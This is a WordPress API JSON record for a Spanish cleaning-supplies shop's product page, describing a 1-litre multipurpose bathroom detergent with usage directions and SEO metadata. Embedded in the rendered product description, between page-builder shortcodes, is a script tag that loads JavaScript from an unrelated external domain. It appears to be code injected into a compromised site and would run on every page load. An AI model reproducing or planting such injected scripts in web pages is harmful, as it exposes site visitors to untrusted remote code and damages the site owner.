{"id":8056,"date":"2019-08-29T10:58:19","date_gmt":"2019-08-29T09:58:19","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=8056"},"modified":"2023-05-26T21:23:09","modified_gmt":"2023-05-26T20:23:09","slug":"bote-1lt-lime-ds-meprolim","status":"publish","type":"product","link":"https:\/\/meprolim.es\/fr\/producto\/quimicos-y-articulos-de-limpieza\/productos-quimicos-industriales-fr-2\/detergente-multiusos-fr-2\/bote-1lt-lime-ds-meprolim\/","title":{"rendered":"BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS &#8211; C\u00d3DIGO: FR2060"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p style=\"text-align: justify;\">Gracias al poder de limpieza de su f\u00f3rmula, desengrasa a fondo y deja la superficie a limpiar muy brillante, incluso sin aclarado. Ideal para la limpieza profunda y el perfumado en superficies duras (Suelo, Mesas, Azulejos, etc.). Las exclusivas fragancias de larga duraci\u00f3n hace que duren varias horas despu\u00e9s de haber limpiado. Incorpora componente de baja alcalinidad para aumentar el poder desengrasante y de limpieza del producto. Apto para uso alimentario.<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<ul>\n<li>Bote de 1 litro.<\/li>\n<li>Ph 6-7.<\/li>\n<li>Desengrasa a fondo y deja la superficie a limpiar muy brillante, incluso sin aclarado.<\/li>\n<li>Ideal para la limpieza profunda y el perfumado en superficies duras (suelos, mesas, azulejos,&#8230;)<\/li>\n<li>Exclusiva fragancia de larga duraci\u00f3n.<\/li>\n<li>Componentes de baja alcalinidad para aumentar el poder desengrasante.<\/li>\n<li>Polialcohol, caracter\u00edstico olor a limpio.<\/li>\n<li>Alto poder de evaporaci\u00f3n.<\/li>\n<li>No deja residuos.<\/li>\n<li>Contiene tensioactivos, poder de limpieza y abrillantado.<\/li>\n<li>APTO PARA USO ALIMENTARIO.<\/li>\n<li>Producto l\u00edquido.<\/li>\n<li>Color: azul.<\/li>\n<li>Perfume: herbal fresco.<\/li>\n<li>Para superficies muy sucias diluir 1,5% de producto en un cubo de agua de 5 litros.<\/li>\n<li>Para limpieza diaria diluir 0,5% de producto en cubo de agua de 5 litros.<\/li>\n<\/ul>\n<p><strong>SKU: FR2060<\/strong><\/p>\n","protected":false},"featured_media":10885,"template":"","meta":[],"product_brand":[],"product_cat":[664,652,94],"product_tag":[665,654],"class_list":{"0":"post-8056","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-detergente-multiusos","7":"product_cat-productos-quimicos-industriales","8":"product_cat-quimicos-articulos-limpieza","9":"product_tag-detergente-multiusos","10":"product_tag-productos-quimicos","12":"first","13":"instock","14":"shipping-taxable","15":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS - C\u00d3DIGO: FR2060 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS - C\u00d3DIGO: FR2060 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"Bote de 1 litro.  Ph 6-7.  Desengrasa a fondo y deja la superficie a limpiar muy brillante, incluso sin aclarado.  Ideal para la limpieza profunda y el perfumado en superficies duras (suelos, mesas, azulejos,...)  Exclusiva fragancia de larga duraci\u00f3n.  Componentes de baja alcalinidad para aumentar el poder desengrasante.  Polialcohol, caracter\u00edstico olor a limpio.  Alto poder de evaporaci\u00f3n.  No deja residuos.  Contiene tensioactivos, poder de limpieza y abrillantado.  APTO PARA USO ALIMENTARIO.  Producto l\u00edquido.  Color: azul.  Perfume: herbal fresco.  Para superficies muy sucias diluir 1,5% de producto en un cubo de agua de 5 litros.  Para limpieza diaria diluir 0,5% de producto en cubo de agua de 5 litros.  SKU: FR2060\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2023-05-26T20:23:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/FR2060.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergente-multiusos\\\/bote-1lt-lime-ds-meprolim\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergente-multiusos\\\/bote-1lt-lime-ds-meprolim\\\/\",\"name\":\"BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS - C\u00d3DIGO: FR2060 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergente-multiusos\\\/bote-1lt-lime-ds-meprolim\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergente-multiusos\\\/bote-1lt-lime-ds-meprolim\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/FR2060.jpg\",\"datePublished\":\"2019-08-29T09:58:19+00:00\",\"dateModified\":\"2023-05-26T20:23:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergente-multiusos\\\/bote-1lt-lime-ds-meprolim\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergente-multiusos\\\/bote-1lt-lime-ds-meprolim\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergente-multiusos\\\/bote-1lt-lime-ds-meprolim\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/FR2060.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/08\\\/FR2060.jpg\",\"width\":768,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/detergente-multiusos\\\/bote-1lt-lime-ds-meprolim\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Catalogue\",\"item\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/catalogue\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS &#8211; C\u00d3DIGO: FR2060\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS - C\u00d3DIGO: FR2060 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/","og_locale":"fr_FR","og_type":"article","og_title":"BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS - C\u00d3DIGO: FR2060 - Meprolim","og_description":"Bote de 1 litro.  Ph 6-7.  Desengrasa a fondo y deja la superficie a limpiar muy brillante, incluso sin aclarado.  Ideal para la limpieza profunda y el perfumado en superficies duras (suelos, mesas, azulejos,...)  Exclusiva fragancia de larga duraci\u00f3n.  Componentes de baja alcalinidad para aumentar el poder desengrasante.  Polialcohol, caracter\u00edstico olor a limpio.  Alto poder de evaporaci\u00f3n.  No deja residuos.  Contiene tensioactivos, poder de limpieza y abrillantado.  APTO PARA USO ALIMENTARIO.  Producto l\u00edquido.  Color: azul.  Perfume: herbal fresco.  Para superficies muy sucias diluir 1,5% de producto en un cubo de agua de 5 litros.  Para limpieza diaria diluir 0,5% de producto en cubo de agua de 5 litros.  SKU: FR2060","og_url":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/","og_site_name":"Meprolim","article_modified_time":"2023-05-26T20:23:09+00:00","og_image":[{"width":768,"height":768,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/FR2060.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/","url":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/","name":"BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS - C\u00d3DIGO: FR2060 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/FR2060.jpg","datePublished":"2019-08-29T09:58:19+00:00","dateModified":"2023-05-26T20:23:09+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/FR2060.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/08\/FR2060.jpg","width":768,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/detergente-multiusos\/bote-1lt-lime-ds-meprolim\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/fr\/"},{"@type":"ListItem","position":2,"name":"Catalogue","item":"https:\/\/meprolim.es\/fr\/catalogue\/"},{"@type":"ListItem","position":3,"name":"BOTE 1LT LIME DS MEPROLIM DET.BA\u00d1OS &#8211; C\u00d3DIGO: FR2060"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product\/8056","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/media\/10885"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/media?parent=8056"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_brand?post=8056"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_cat?post=8056"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_tag?post=8056"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}